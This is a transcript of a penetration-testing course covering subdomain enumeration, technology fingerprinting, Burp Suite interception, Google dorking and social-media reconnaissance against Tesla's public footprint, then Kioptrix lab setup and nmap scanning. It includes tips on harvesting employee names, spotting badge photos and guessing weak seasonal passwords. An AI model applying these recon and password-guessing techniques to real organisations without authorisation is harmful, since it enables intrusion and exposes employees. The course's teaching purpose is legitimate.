try to search now while this is going on i want to point out another way to do this so let's go out to the web and let's go and load up another site called crt.sh so we say crt.sh like this it'll load up a website like so let me make this a little bigger for you and we can do the wild card ourselves so you see the percentage is a wild card so we're just going to say percent.tesla.com now we're doing is we're using certificate fingerprinting now we're going to go out and look for certificates that have been registered and it's going to attempt to find those and tell us what's out there so you can see that we can find energysupport.tesla.com gridlogic.energy.tesla.com and we would scroll through these and try to identify all the different ones like sso single sign-on that might be interesting if i could find anything in here that's like vpn.tesla.com or dev.tesla.com any sort of thing like that i'm also interested in it api toolbox could very well be interesting sso-dev.tesla.com so these are the sort of things that we're after and you see right now that we have different levels to domains like here you see that we have our sub domain but what about a sub sub domain like a fourth level of a domain you see gridlogic.energy.tesla.com so we can go deeper and deeper when it comes to these domains and what sublister is going to be doing right now is it's going to try to find just the sub sub domain so it's going to look for third levels it would not discover this gridlogic.energy.tesla.com without a little bit of finagling and looking through the help to figure out how to do that so we can come to a site like crt.sh to see if we could find any additional sub domains within this and we can utilize tools like sublister as well so i'm going to let this finish but in the next video i'm going to show you is i'm going to show you how to improve upon this process with some tools that have been written in go that i think are fantastic so i'm going to let this run we're going to have part 2 of this video where we actually review the results and then we'll go from there so i will see you over in the next video okay so we have our results back in part one we went pretty quick part two i want to talk about the results what might be interesting here and then identify some other tools that you can download and use and go play with on your own so this has identified quite a few things i mean there's a big list here 87 subdomains and i lied to you when i said that it didn't get fourth levels i thought there there used to be a recursive feature where you'd have to do a dash r to get those now you don't have to do that it just picks up fourth levels for you now sublister is great at finding some of these things like if we come through here there is a dev.tesla.com and i saw down towards the end that there was some staging staging two here a dev here a test these all look juicy sso dash dev looks juicy i might be after something like qa as well or something like vpn.tesla.com i want to know where your mail is at so here's webmail xmail anything here you could also look through these lists and possibly identify what kind of tools they're using you might see something like link.tesla.com or zoom.tesla.com and this really just kind of drives home what they're running on their back end for a lot of things now this isn't the all-inclusive sublister is a great tool sublister was ahead of its time when it came out but there are better tools out there there are tools that incorporate pretty much everything in one go so you might have cert.sh like this you might have sublister included and the one tool that is really popular if you go out to google type in owasp a and this is the go-to tool for a lot of people doing bug bounty hunting so if we click on the a mass project here in github you can download the project and install it per the installation instructions here so you have an installation guide down in the documentation the reason i have chose not to show it in this series is because actually running a mask takes a long time but you can configure a mass to do a lot of things and find a lot more subdomains so my challenge to you is to get a mass installed and on top of that see how many more sub domains than 87 can you find when you actually run it so another last thing to point out is if you want to use sublister and you were used it was really really slow it's always helpful to check the dash h on the help and you can see in here that there is a dash t for threads always check the help so we can specify a domain like we did before do something like dash d of tesla dot com and then you can specify threads of like a hundred as opposed to maybe one thread or ten threads that was running originally we give it a hundred threads it's gonna go a lot faster we're gonna get a lot more results you could also do a dash v for verbosity here and get your results in real time if you're impatient or you're trying to go out to the web so there are great tools out there for doing sub domain hunting and again sub domain hunting is very very critical because if we just limited ourselves to tesla.com look at all the things that we would miss so we can find out a lot here now not all of these pages are going to be alive also there's a good possibility that we can go to something like this mfa.dev or dev.tesla.com and then it won't work we can give it a go and see like not always do these work these are what show up in search engines but it's worth knowing about them and there are other tools out there such as like go to google such as tom nom noms http probe like this tools like that out there that will probe the list that you give it you can give it this list into the probe it'll say hey this website's alive or this website's not alive and then you can start narrowing down these lists as well so that is something to think about when you get your wheels spinning but for now for information gathering and for the scope of this course we don't have to worry about it too much but i do want to point out some other alternatives and ways to do subdomain hunting and then what to look for in sub domain hunting so that is it for this video i'm going to catch you over in the next one now the next few videos have to deal with web apps as well but instead of looking at subdomains we're going to look at what a website is built with and that's a good indicator here of built with so let's go out to google and we're going to just search built with we're going to go right to builtwith.com and let's take a look at what this does so let's just search tesla.com for example we'll do a lookup and i'm going to make this a little bit bigger so you can read it and what this does is this goes out and it looks at what type of tech tesla's running now it gives all this stuff that it can see google analytics salesforce that's great but it also tells us the widgets that are running you can see it is part of bug crowd log me in twitter okay it's got these language things here but what we're really after is what kind of frameworks it might be running on so it says here that it's running on php it has adobe enterprise cloud okay that's interesting uh it's got cdn the content delivery network interesting it utilizes stripe okay we can scroll through this looks like it might be written in drew paul that's an indicator there and this is a big website so it's got a lot look at all the information here and it might be a lot to track down so with this with a big website like this there's a better way i think now built with is a great great resource but i think there's some other stuff out there that might help us a little bit better so let's go out to google as well and let's search for a tool called wapalizer just like this and we're going to use it for firefox so it should pull this up here and we'll click on the first one and go ahead and just select add to firefox select add and now it will appear so now we have wabalyzer let's go back to tesla and you see this little guy here in the corner we're going to click on this we're going to accept it and now we get a little bit of information as to what's going on not as much information as built with but i actually like wapalizer a lot more because it kind of just gives you an indication right away with what's going on now wapalizer is more of an active type of reconnaissance i only say that and i don't necessarily believe it but it's because we do have to interact with the website now we're not doing any type of scanning we're just going out to the website like a normal user would and to me it's still kind of passive because we're not doing anything that would be out of the norm so here we can see the content management system is running on drew paul we can see the programming language is running php those are both identified with built with as well now why is this important you're telling me well it's important because if we know that's running with php or drew paul there might be a vulnerability within those a lot of times when we have this let's see if we go to this website you can see php's running we get a lot of things and we get version numbers so look at the wapalizer website you see that it's running on an operating system of ubuntu it's got a programming language php the web server is nginx with 1.14.0 version number okay it can tell that it's running on amazon web services as a platform it's got all kinds of information here it's got the payment processing it's running google analytics so see the type of information that can come through a lot of times you'll see things like jquery and other type of libraries here and the version numbers as well now you take those version numbers and you do enumeration on them and you try to find any type of vulnerabilities that might happen there and the more information that we can gather on a client on a website whatever it is the better off we are so when we're gathering information on tesla okay now we know the content management system is written in japan the programming language php is that going to lead to an exploit maybe but you don't know where it's going to come up in the future so this type of information gathering is great now one more thing that we can use we've got something built into our machine let's go out to the terminal and we can take a look at it so we've got a tool called what web just like this and hit enter on it and if we look at the syntax all we need is to specify a target so we enter the url host name ip address or nmap format so we just say what web url so let's give it a go we'll say whatweb and we'll just say https tesla.com and it is a redirect so it might not pull down everything for us here so it did pull down an ip address it gave us a redirect i don't know if there is a follow redirection option here um but what we'll do is we will just say something instead we'll say like tesla.com instead of 443 and see if that does anything different and it didn't so it does give us some information in here it's not as pretty of a layout but it is a tool that is built in to kali linux for us so look we can pull down drupal 8 we didn't know what kind of drupal it was running on now we know it's drupal 8. we see that it's running php 7.3.7 that's identification too that we didn't have previously so using more tools to our advantage gives us more information and we can pull down the headers that it has here and you see they have different types of headers which we're not going to get into this quite yet when we get into the web app portion of this we'll talk more about headers but this is just yet another thing that we need to look at and we pull down an ip address as well so a little bit more information that we can gather here and just keep going from this so that is it utilize the resources around you to gather information we could utilize resources that go out and scan a specific web page like this we can go and utilize a resource such as wapalizer that you just visit the webpage and you can see what's running on there or a website like builtwith.com where we just don't even navigate to the website we just type it in and it does all the work for us and we can pull down all this information which is by far the most information out of these three tools so utilize all the resources available to you and you will have much advantages when it comes to pen testing and your enumeration skills so that's it for this video i'll catch you over in the next one another useful tool when it comes to web applications is a tool called burp suite now let's go ahead and open up burp suite so we're going to go up to the applications and in your favorite should exist burp suite here now burp suite is what we call a web proxy now web proxy means that it has the capability of intercepting traffic for us and we're going to see what that looks like so you're probably going to get this error about this jre don't worry about it we're just going to say okay you might get a you need to accept this license agreement when you first start go ahead and accept that as well and if you see an update screen go ahead and just close so we are on the community edition so we will have limited features we'll talk more about those when we get to the web application section but i just want to introduce you to what burp suite can do in a very basic form and how we can actually gather some information out of a website from burp suite pretty easily so let's go ahead and just select temporary project and click next and then select start burp now the first thing that we're going to do is we're going to set up our firefox for utilizing burp suite so go ahead and go to favorites in firefox and i want you to go over to the right hand little hamburger here and you're going to go and select preferences from preferences we're going to scroll down all the way to the bottom and we're going to select settings now we're going to select this manual proxy configuration here and we're going to say 127.0.0.1 on port 8080 later when we get to the web application section i'll show you a much easier way of doing this with a tool called foxy proxy but for right now this is a very high level overview so go ahead and use this proxy server for all protocols and that should fill in the rest down here we're going to go ahead and hit ok and we're going to leave this open i'll show you why in a second so i also want you to go to a new tab and i want you to go to https double dot slash verb like this now your first page might not show up like this it might show up with a you need to accept this certificate you're just going to say allow down at the bottom and say yes permanently store this exception and then you'll be brought to a screen somewhat like this so what you're going to do is you're going to go ahead and just click on ca certificate here and then save the file mine is already saved as you can see in my downloads right here so what i'm going to do is we're going to go back into preferences once we have that saved and we're going to go to privacy and security over on the left-hand side we're going to scroll all the way down to the bottom and there is a view certificates button down here and then we're going to go ahead and just hit import your downloads folder should automatically be selected if not select downloads and then just select the ca cert.der hit open and then it's already installed for me but you will have two check boxes check both of those boxes and select ok and then it should now be imported for you so a couple things to note firefox sometimes changes things around i'm recording this video in 2019 if you watch it at a later time just be cognizant that in the general tab usually towards the bottom is the network settings and the privacy and security settings usually contain the certificates so look around for those sometimes these move so from here let's go ahead and just see what we set up so i want you to go ahead and try to go to a website we can try to say tesla.com and it is going to stall out what is going on here so if we go over here we see this proxy tab is lit up in orange we're going to go ahead and click on that and you can see that it's gathering some data here it's captured some stuff from firefox uh we've got more firefox we can just click forward through this if we want and now we can see tesla's starting to load and what we're doing is we're intercepting requests that tesla is making out this to me looks like a api request or geoip request so this might be geolocation looking for a city so we're just clicking through clicking through all we're doing is capturing all different kinds of traffic and we can modify this traffic say we have this request here you don't have to know what this is right now but we've got this get request we can make this a post request and forward that and see what happens i'm just going to turn the intercept off i'm going to show you what's going on here so we can go over to the target and you can see all the pages that have loaded in here this is all the traffic that has been intercepted so far since we ran tesla so not only is tesla running but you can see that it pulls google analytics it pulls this secured visit which looks like tracking as well it pulls double click which looks like maybe ads and then it has an api running here as well so it's gathering all this traffic through but we're going to dig into this tesla here and i just want to click on the first forward slash and see if there's a response to our request there isn't let's go ahead and just look at maybe the let's see if we click into one of these if we get a good response we don't let's refresh one more time on the page and you might even need to hit enter okay and sometimes it doesn't come through right away so let's go ahead and just click around there we go do you see all the stuff coming through now that's more like it it wasn't picking everything up right away so what we can do is we can look at some of the things that just came through like we just went to the model 3 page so let's go ahead and click on this model 3 and see what it's got for us so you can see that if we look at the request for this get model 3 we made a get request to model 3 and what's happened is we say hey i want to go out to this page go ahead and take me there and then we can view the response as well now in the response we can get so much information look at this we're seeing here that php 7.3.7 is running on the back end we can see a bunch of information here as well like drew paul 8 is running we identified that earlier but we're identifying it again we could see a lot of other stuff there's weird things here going on too like there's a server name sitting in here typically on an assessment this would actually be a finding a low finding but it's informational as this is giving us information on possibly naming structure inside the network but they also have their own tesla type header here so this is very unique for a client but what the point of the matter is here is that we can intercept a basic request and response and get a lot of information through burp suite we're going to hit home on this really hard when it comes into the scanning and enumeration section and when we get into the web section as well but for now i just want you to take away that we've installed burp suite and we can go out to a website and i still define this as not active scanning there is a feature in burp suite that has active scanning that we could actually run but that is a burp suite pro so it has a vulnerability scanner built in you can see see up here upgrade to burst professional automatically find vulnerabilities i have burp suite pro it's 400 a year is absolutely fantastic worth the money one of the few applications that i would recommend anybody buy but for the course i'm going to limit it to utilizing community edition i will bring in pro sometimes just to show you some features but we're not going to worry about that so long spiel short i still feel that we are in step one here even though we are accessing the website we're not doing anything very actively with scanning this is all very passive we're using traffic like a normal user would so you can see that we can intercept traffic and get a lot of information again tools like wapalizer look it pulls down the headers for us and it says hey it's running php 7.3.7 it's running drupal 8. where is it getting that from well it's getting it from these responses so it's pulling a lot of that down for us automatically but there's a lot of things that we can do when we get into burp suite as well so consider this just a mini introduction into the tool and then we'll touch back on it over and over again as we go so this is it for this video we're going to get into some google foo in the next video and talk about social media as well so i'll see you in the next one okay now on to what is going to be your absolute best friend in your entire life and in your career google google everybody i cannot stress how important it is to be good at googling and you don't have to be amazing at it but there are so many things that people approach me with that you can find on google in a second and if you've never seen the let me google that for you that's a that's a lot of my life uh when it comes to the questions i get asked and what makes a really good pen tester or a really good anything especially in i.t is the ability to google so being able to look this stuff up on your own and be able to find your own resources and find solutions to your problems are going to make you a way better pen tester and just way better at your career with troubleshooting and everything else so i'm done harping i just wanted to stress how important i think google is so i'm going to show you today what's called a little bit of google foo so i'm already out on the interwebs i'm out to google and here we've got google up but i want to show you that i just searched for google search syntax and the first one google search operators came up if you go look at this page this is a really nice list of some things that you can run on google and we'll help you out i'm going to show you just a few things that we can use to search for and how we can start narrowing down some results so if we go to google and we just type in something like tesla that's going to bring up tesla here okay we found the main tesla site but we're going to get news articles and we're going to get all kinds of stuff okay we get the twitter and maybe we want this maybe we do but maybe we don't maybe we don't want all this mess maybe we only want items from tesla so we could just say something like site tesla.com which we've discovered here and notice i'm not putting in the www because that would limit us to that specific domain so we have the www's in here but you can see that it's starting to pull in something like shop and other items right so we can search for tesla.com and maybe maybe we don't want tesla.com www maybe we take out with the subtract here maybe we just take out www and we're going from 600 and almost 700 000 results to 131 000 results and you can see now we're pulling in ir we're pulling in forms and we're pulling in shop and we're getting all these different unique sub domains so i've showed you sublister and i've showed you other ways to find subdomains including the harvester but you can find subdomains like this as well and let's say you only want to find things like you know ir then we can just come in and we can say ir dot or maybe you don't want www and you don't want ir you can take those both out and you start finding more like partners.tesla shop again is coming up so you can start finding different subdomains this way pretty good a couple other things that we could look for what about file type we could say file type like this and we could search for something like i don't know doc x maybe there's a doc x out there and there's one docx okay it's a survey probably not useful to us uh maybe we can search for pdfs with a company's biggest tesla it's probably going to be a lot to search through but there are 3 300 of these almost 3 400 of these so they've got different items here that we can look through you know maybe xlxs excel right actually that's sx and you can see if there's any excel and csv so what we're doing here what's the point in me doing this well the point of me doing this is me looking for potentially sensitive files out there or information you would be surprised a little bit of hunting on a domain now give granted here that tesla is a big company big domain and it's going to be hard to find some of this information but you would be very surprised with a little bit of prodding a little bit of google foo and narrowing down the type of results that you can get off of a company i mean we can find all kinds of interesting stuff for an example just the other day i found a backup page of an entire website just by doing something like this entire website credentials source code everything and just through a little bit of google food so again google is your absolute best friend before you ask anybody a question no matter how complex i challenge you to google it first make sure you have done your research and then ask somebody you know it's just good to get in that habit and this is what is going to make or break you i believe in your career so please please do not ignore the google machine it is out there to help you and it will pay your salary uh over and over again so that's it for this video we've got one more video left in this series or this subset we're going to talk about a little bit about social media and how we can target that so i will catch you over in the next video okay so you don't have to follow along in this video i just kind of want you to start getting the wheels spinning and thinking about other items that we could be looking for when it comes to osint now we could look on a website like linkedin or like twitter and find useful information i was on this website for literally one minute i've logged in i went to tesla and i've already kind of found something and i want to show you how fast this is so you come in here and you go to tesla the company the company page here and i love to click on images there's always employee photos on images now you scroll down a little bit and you can see somebody has recently posted a picture of their internship at tesla and what we can do is click on the picture and look for things like badge photos or desk pictures or anything of the sorts now good employees are told to hide their badges from pictures and you can see they've done a pretty good job but if you look down here right down here it's hard to zoom in but there is 100 a badge there is this a great picture no but this is a good example of an easy way to find a badge is utilizing social media and you can find a lot of stuff very very very quickly so another thing to point out too is that twitter is a gold mine for these kinds of things i have found badge pictures desk pictures software all kinds of stuff via twitter and via linkedin now from the non-physical perspective or information gathering perspective for what seems like physical assessments the other thing to point out is that it's really good to find the people like linkedin's great so we can come in here we can find members right and these are all going to say linkedin members i don't have this account is just kind of my my peeping account that i just utilize when i want to look and not trigger anything weird when i'm looking at a company because if somebody sees me as a person looking at a company they might say why is this guy looking at my profile so we you might not get names if you don't have the premium on some of these you might see linkedin member but you can also dig some names like here's a name here's a name here's a name and you take those names and you remember the formatting from before right we had the formatting when we looked at hunter.io and we said okay first initial last name well i might take a first initial last name here and i'll add that to my list now we could utilize scrapers out there to look through the employee list and pull down all the the names and then transfer those names into first initial last name you could write a script to do that with python if you want to challenge yourself to do that i guarantee you there are tools out there to do this but this is the kind of information that we're after we're after what kind of credentials can we gather and this loops all back this is the the the wheels spinning here right you want email addresses when we're talking network and we're talking what you're going to be doing with these kind of assessments you want these email addresses you want anything that's been a part of a breach current credential leak right and you just want as much information on the employees that you can gather when you take all these email addresses and it says something it says 34 000 employees when you take 34 000 employees i would almost bet money on it that one of these employees has a password of something like fall 2019 or winter 2019 exclamation or something like tesla one two three four exclamation people are always the weakest point of an organization and people will be lazy with their passwords unless you absolutely force them to use long passwords i do not know tesla's password policy but i get in almost every external assessment with a weak password like fall 2019 or winter 2019. so i want you to think about these things we're not going to go too depth into social media but have that in your wheelhouse as well we're just trying to utilize as much resources that are out there in order to use them for our advantage so there's a lot of tools that i've shown you and i've given you a lot of the basics and really that's all you need for information gathering google is your best friend utilize google to your full advantage utilize social media people post things all the time that they shouldn't be posting and just dig deep information gathering is one of the most important steps along with scanning enumeration keep repeating that to yourself and you'll be very very successful as a penetration tester so that is it for this section i kind of just wanted to give a brief overview of this and then give you some ideas to get your your wheels spinning and really think about it again we're harping on breach credentials mainly so from here we're gonna move into scanning and enumeration we're gonna start doing our hacking getting into the real weeds of hacking and i'm very very excited about that and you're going to see some of the stuff that you've seen before when it comes to reconnaissance pop back up so i'm excited to to see this play out through the course and how we're going to utilize it so that's it for this section i look forward to seeing you in the scanning enumeration section so i will catch you over there welcome to the scanning and enumeration section of this course it is actually now 2021 when we're recording this and we're doing some light updating on how we go about starting off this lab in this section so we're going to be using a vulnerable machine called kioptrex if you go to google you can type in chiaptrix and find it fairly easy so you go to keyoptrix like this k-i-o-p-t-r-i-x and we're gonna be using level one i'm showing you the source of where it's coming from but we're actually going to provide this vm just to avoid any sort of confusion so key objects level one here comes from a website called volnhub let me make this a little bit bigger so you see vulnerabilityhub is a great website and great resource once you kind of get into hacking and learning about this where you could come to volenhub and just download a vulnerable machine run it on vmware or virtualbox or however you want and try to attack it and you can see they have difficulty easy intermediate you can come through here and just have fun playing with vulnerable machines and that's all chiaptrix is it's a beginner level vulnerable machine that you can download install and run now the download and the install you can see this is from 2010 some of the stuff was broken sometimes a little bit difficult to get running in the original lab so we're just modifying this a bit to make it easier what we've done on our end is just hosted a file that will work that will should by default install and run so if you go to your browser and you just go to tcm sec dot com like this and you type in forward slash key optics k-o-p-t-r-i-x pause for a second make sure you see this and then you just hit enter you'll be brought to a google drive okay and this google drive here should say kyotrix you should have an ovf and an ova file all you need here is the ova and all you'll have to do is just hit download right here get the download going i believe this is around 250 megabytes so it might take a minute go ahead download it pause and then come back when you're ready to continue okay so moving on i'm going to show you how to install this on vmware and on virtualbox these are the only two supported methods that we're going to utilize in the course if you're going and you're using something like vmware horizon or you're using a different type of virtualization software that's fine but we can't support it if you run into any issues so we strongly strongly recommend using vmware if you're using virtualbox that's fine as well but we're going to be doing most of the course in vmware though it should not matter too much so here is vmware i'm going to show you first how to install it here and then we're going to go ahead and do the same thing in virtualbox so all we're going to do is we're going to go to player up here or we can go to home actually and we could just say open a virtual machine and then just go ahead and navigate to the area where you downloaded it okay so here's my file key optics level one i'm going to say open i'm going to go ahead and just save this here so i'm going to say this is where you want to save your storage path i'm saving it here call it objects level 1 import the defaults are fine you might get an error right here that's okay too just hit retry and it should work fine it's going to take a second to import while we're waiting i'm going to go ahead and also do the same thing with virtualbox so i'm going to get virtualbox going and what we'll do here is a similar process so we'll go to import and then we'll just select the area for our file okay and mine again is just sitting here on this drive keyobjects level 1.oba i'll hit next and then it's going to ask me some questions here we're just going to hit next on this we'll go ahead and set these up in a second so i'm just going to say import and that'll be fine all right so looking at the settings for both of these machines i'm going to go ahead and drag this over here we can just right click and go to settings same thing here you can right-click and go to settings and we're going to set these up the same so either way on 512 megabytes this is fine honestly if you wanted to kick this down to 256 you could i would not recommend going any lower than 256 though oops i did not mean to exit that um though i will say that if you have i wouldn't go lower than 256. we're just going to be running this in the background but you don't need to go higher either so 256 i think is fine if you want to give a 512 that's fine too depending on the amount of ram that you have on your actual machine so 256 is good and then here in the network adapter we're going to switch to nat okay so make sure you're good there and just hit okay and that should be it same thing here so if you want to switch the storage you can or the the amount of ram allocated you can only big thing here is just going into the network and you can see that it says nat network and that's exactly what we want okay so this box is set up just fine and then all you have to do on these is just hit play okay all you got to do is power it on you could just say start here and i could just hit play here and both will start all we're going to do is just let this run so that's all you want to do at this point you're just going to let it run you can see i've got both machines booting you will come to a login screen and that's when you know that this is ready okay so when you're at the login screen it'll say hey kiatrix blah blah blah and then we're going to take it from there and we're going to figure out how we can get into this machine okay so if you get a screen like this you can just say do nothing and just let this keep booting but other than that once this runs to a login we're going to go ahead and move on to the next video so you see this once you're at the login screen you are good to go all right and that is it so i will catch you over in the next video as we walk through how to find this machine and then we're going to start scanning it and tacking it and hopefully rooting it so i'll catch you over in the next video hello everybody and welcome to this section on nmap i'm actually recording this in 2020 so the video you're going to see here shortly is from 2019 we've had a little bit of issues with the command that i show which is net discover on how to find your ip address of the kioptrix machine to actually begin scanning this machine so i'm going to show you a couple of alternatives and then i'm going to let the video play as it was before and you'll have several options on how to find your kiaptrix machine and hopefully find the ip address so at this captures login page we can cheat just a little bit so what i'm going to do is i'm actually going to give you a login here and just go ahead and type john as the login and i'm going to show you the password before i delete it the password is going to be two cows2 just like that t-w-o-c-o-w-s-2 with the t and a c capitalize so go ahead and type in john and then two cows two and you can see we are now logged in as john at keoptrix now this machine is very very old so the typical ifconfig or ipa or any of those do not work on this machine however we can do a quick ping for example to anything we want we could say 8.8.8.8 it could be an internal ip address it doesn't have to be an ip address that resolves but we could say ping and as we ping i'm going to hit control c here you can see that we see ping from 192 168 4.53 that's my ip address now the ip address you're going to see here in the video shortly is going to change however as of right now the ip address i'm seeing for chiaptrix is 4.53 now we also use netdiscover but there's actually a cool tool we can utilize as well now if we come into the network you can see that i have a ip address of 192.168.4.51 for myself now there is a tool built into kali linux that is called arp scan and you could do a syntax of a dash l with that hit enter and it's going to pull off an arp scan as well which is what netdiscover is doing what we need to be looking for and you can see this is kind of my home network what we need to be looking for is vmware you can see vmware is sitting here at 192.168.4.53 the only one to be on the lookout for is possibly yourself which we're at 51 i don't see in this list it didn't pick us up so i could see 192 168 453 vmware should be the only one that's running or if you're using virtualbox or something like that it should show up here so kind of identify either this way or you can come in and identify it through the keyobjects login itself of course you can use netdiscover as shown in the video so without further ado let's go ahead and go into the video on scanning with nmap okay so now we have keoptrix up and running we need to determine where it actually is and then we can do a little bit of scanning so what we're going to do is we're going to go up into our applications and open our terminal i'm just going to make this a little bit bigger and we're going to run a tool called net discover so before we can do that we need to type in ifconfig and identify your ip address so i'm just going to go ahead and copy this first three octets here and we're gonna run netdiscover so netdiscover is gonna look like this we're gonna say net discover we're gonna do a dash r for range we're gonna paste in this and do a dot zero 0 24 so what are we doing we are going to be using arp to detect all the machines on the network so you should be familiar with arp from the linux lessons and from the networking lessons so we're going to attempt to use arp to address anything on the network and we're sweeping the entire subnet of slash 24 so i'm gonna go ahead and hit enter and in a second here our machine should start popping up and it does so remember our host was at 139 this host here at 134 is likely our culprit so you should only have two machines in network because we're only running two you can ignore 1.2 and 254 we are only focusing on the one that looks similar to ours which is 192 168 57 134 so now we know our machine address we can start attacking it so i'm going to go ahead and hit ctrl c which is going to kill this session here and i'm going to hit ctrl l to clear my screen all right so i'm going to open up a notepad and we'll just store this away for a rainy day we need to first talk about what we're going to be doing here so remember before when we ran our tcp three-way handshake we had something like sin sin act and ack right and we can just say synack kind of like this to combine it so we've got three parts we've got the part where we reach out to a port and we say hey port are you open and the port says yeah i'm open let's go ahead and make that connection and then we go ahead and connect to it so what we're going to be doing is we're going to be using a tool called nmap and nmap stands for network mapper now what network mapper is going to go out and do is is going to scan for open ports and services now this scanning is going to take place and it's going to identify these open ports with something similar to this three-way handshake so we're just going to modify it a little bit now what the process that we're doing is called stealth scanning and it used to be written out like this now it's just done by default and we'll get to the switches here in a second don't worry about that just we're going to be running stealth scanning and now the stealth scanning used to be stealthy right that's why they called it stealth scanning because it used to be undetectable nowadays very detectable if you run nmap in a network that has good security you're going to get picked up although being a pen tester i would say nmap probably doesn't get picked up in 80 of the assessments that i run so don't expect clients to be running good security but just know that even though it says stealth it's not stealthy at all so the stealth scanning why was it stealthy why was it called this well if we go back to the three-way handshake what the stealth scan does is it does the sin it says hey i want to connect to you and the open port if it's open will say yeah i want to make that connection back with you friend and what's going to happen is we're just going to say you know what i'm just kidding i'm going to send over this reset flag so this rst why well that means we don't actually establish a connection so like when you go out to a website and you go to google and google loads well guess what you establish that connection you establish that three-way handshake what we're doing is we're going out and we're saying hey i want to establish connection the port reveals to us that yes i am open for connection and then we're going to say just kidding let's not make that connection because we never established that connection then it was technically stealthy so that's what we're going out we're doing we're never making connections these ports but this is how we're identifying them as open so we're going to use a tool and we're going to use a tool like this we're going to say nmap and we're going to say something along the lines of dash t4 dash p dash dash a now you have no idea what this means and i don't expect you to but i'm going to walk you through these and what we're doing here is we're saying hey nmap i have a choice in speed and that choice in speed can be between a one and a five one's really slow and five is really fast now the default for me has always been four now i'm teaching you my preference it's always been four okay and we utilize this and i think five five's okay but five kind of fast maybe you're going to miss something maybe it gets caught the slower the better in terms of detection but in the instance that we're going to be running it through this course we're going to use four anytime you do like a bowling hub or something like a hack the box which you're going to see here in a few videos you're going to run t4 just because you're not worried about this detection you're not worried about anything so t4 is a speed purpose now dash p dash well this stands for i want to scan all ports okay we could say something like dash p or we could just have dash p left off completely now if we leave off dash p completely it's going to scan what are known as the top 1000 ports the top 1000 ports are your most common ports so think of like port 80 port 443 139 445 all the ports that we covered in the networking section going to show up again here but there are 65 535 ports out there we want to scan every single one of those because what if for example there is a service running on port forty seven thousand seven hundred well that's not a common top 1000 port if we don't scan all ports then we're going to miss that port and that could be something incredibly valuable to us right so i always scan like this dash p dash you can also do things like scan specific ports you could say like 443 or say you wanted to scan just for web servers you could do 80 443 something like that or you could mix in say you want to scan for dns as well you can add in 53 etc you can scan for specifics and we're going to get into that in a little bit of a later video on why we might do it this way but for now for the beginner lesson dash p dash we're going to scan everything and lastly we've got this dash a in here so dash a stands for everything i want to scan all of it i want you to tell me i want you to tell me the version information the operating system information anything you can tell me fingerprinting etc now this may all be confusing it's going to make a lot more sense when you see a scan i'm going to go ahead and open up a new tab and what i want you to do let's go ahead and i'm going to blow this up for us and what i want you to do is i want you to go ahead and start running the scan while we wait so go ahead and copy this here and the last thing we're going to do is we're going to put in our ip address and that's how it knows what to scan we're just going to hit enter on that and now we're scanning so from here what we're going to do is we're going to take this and i want to run mmf again with the dash help and i want to talk through some of these settings in here so that you understand fully what we're doing now dash help is always great as i said before man pages are good as well but let's talk about some things here so we've got this host discovery section which we're really not going to use in this course but this is good for say a dash n say you want to do a ping sweep of the network well you can do a ping scan right where you just sweep an entire subnet a slash 24 for example and see what's up very quick a dash pn maybe the host isn't acting like it's online but you know it's there for sure you can say dash pn and you say hey i want to leave all the hosts or treat all the hosts as if they're online even if they're not responding to my ping request or anything so make yourself familiar with this kind of stuff this is interesting and we'll cover a lot of this as we go in the course but just for the first walk through while we're scanning i think this is super important now scan techniques this dash ss this comes back into play tcp sin is what it's called but it's also known as the stealth scan there's all these other types of scans you're not going to need them i there's only maybe one scan out of all these that may be useful but you're not going to need them through this course and you'll probably never use anything but the ss and the su 99 of the time so for the scope of this course that's what we're going to focus on now the ss we talked about connection oriented protocols we talked about tcp well guess what there's also udp and there's 65 535 ports over there as well that we have to scan now udp is a connection less protocol so what we're going to do when we scan it let's go back to this scan what we're going to do when we scan it is we're going to actually do that su in here and i'll copy this syntax and just move it over so it looks a little cleaner we're going to say something like we could put it anywhere we want the the order doesn't matter but we can say something like dash su to scan for udp and the one little change that i make here two changes actually i take off the dash a and i do a dash p dash why do i or i do a dash p i should say why do i do this i do this because udp takes forever to scan absolutely forever to scan because it is a connectionless protocol it does not have that instant response time so when we scan udp typically we scan the top 1000 that is my recommendation to you or else you will be sitting here waiting for hours upon hours for a scan to finish see now our scan over here is already finished if i were to run this udp with the same thing it will take forever going back into this before we get into the scan you can see here that we can specify dash p of port that's going to be very common for us but here's where i really want to get into we're doing a dash sv a dash sc a dash o here all with the dash a okay so we're probing open ports for service information we could say dash sv and we could say dash sc or we could pick these you know one or the other or a mixture of some of these but we can also do script scanning which we'll get into script scanning here in a little bit as well but we can do os detection where it goes out and it tries to define an operating system and you're going to see all this with our scan but when we use dash a it does it all for us so why why not use dash a so you can see it does os detection version detection script scanning and trace route now there's one caveat to dash a and we're going to talk about this in another video in a thought process it is much faster to remove the dash a and scan a dash p dash typically that'll come back much much much faster then what you can do is you can define the open port so say there's port 22 port 80 okay just go through this you can specify those ports specifically you could say dash p like we did in the example earlier with 80 and 443 and then do a dash a on those now that will just scan only these specific ports with all instead of going out to every single port and attempting to do all on every single port it's just a little bit faster now if your wheels are spinning and you're thinking about it maybe even you can script this right you can script something to say hey nmap i want to take i want to take these ports from a basic scan anything that you pull back and i'm going to go ahead and i'm going to run a new scan on it with the dash a only specifying the ports that we found that gets your wheels spinning this is where scripting becomes important if you want an improvement on speed for me personally i've never ever done that i don't think for me personally that it's made much of a difference i just let my scans run as they run and i work on other things while scans are running there's plenty of time to do other things while you're doing your scanning so and typically another thing to note is typically we're doing scanning when we're doing our ocean as well so if we start up a client assessment one of the first things i'm going to do is probably kick off a nesa scan or an nmap scan and while i'm doing that i'm going to go look for those breech credentials or i'm gonna look for that juicy information on google or social media or where i can find it and utilize that time while this is scanning or else i'll just be sitting on my hands doing nothing while these wait so we're going to take this information now and we're going to start reviewing it so we have here our scan results and you can see the scan results come back and the first thing we notice are open ports that's what we want to look at we want to look at these open ports and we want to look at what's running on these open ports so we see here that what's running on port 22 is ssh okay on top of that it's got a version here for us so open ssh 2.9 p2 and then we see apache is running on port 80. we've also got apache running on port 443 and we've got this rpc bind in 139 now remember from the networking lesson these kind of always play together so we've got s and b open basically samba shares and what we can do is first step is usually enumeration once we see this we take the scan and we scroll down a little bit as well and we can look at some things and see okay there's no os information it found linux here 2.4.x and it's most likely pulling that down from the uh the apache it's probably a best guess because it's running red hat that it's running linux and taking a stab out of here or may have actually determined that from sort of header or some other location a lot of times this isn't so sure as it's saying it is here a lot of times it'll give you a percentage so the os is not always definitive as it is here so we've got the os which could be useful for us later when we do enumeration and you'll see how that comes into play what i want you to take in right now is that so far we've got a scan result back and that scan has gone out and it has looked for open ports doing that modified stealth handshake so it says syn synack 